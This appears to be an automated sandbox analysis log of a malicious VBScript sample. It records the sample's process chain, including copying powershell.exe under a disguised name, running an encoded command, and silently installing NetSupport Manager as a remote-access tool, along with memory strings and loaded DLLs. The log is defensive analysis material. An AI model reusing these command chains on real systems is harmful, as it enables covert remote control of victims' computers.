                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');SELECT Value FROM ParamTable WHERE Param = '%s';UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);NextScheduledMessageIDNextMessageIDNextClientIDCREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));SQL error
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT Value FROM ParamTable WHERE Param = '%s';
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ScheduledMessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, '%s', '%s', '%s', %d, %d, %d, %d, %d, %d, %d);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ClientDupTable(id INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS MessageDupTable(id INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO MessageDepartments VALUES('%s', '%s', %I64u);
                                Source: Pyyidau.vbs ReversingLabs: Detection: 15%
                                Source: Pyyidau.vbs Virustotal: Detection: 25%
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe File read: C:\Users\user\Desktop\Pyyidau.vbs
                                Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc …
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF373.tmp "C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF985.tmp "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                Source: C:\Windows\Installer\MSI1387.tmpProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe winst64.exe /q /q /ex /i
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI23E6.tmp "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                Source: unknownProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Windows\SysWOW64\cscript.exe "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49749
                                Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositorycore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: atl.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: version.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wldp.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: amsi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: userenv.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: profapi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msisip.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wshext.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: appxsip.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: opcservices.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: netutils.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: secur32.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: edputil.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: policymanager.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msvcp110_win.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: slc.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: sppc.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dll
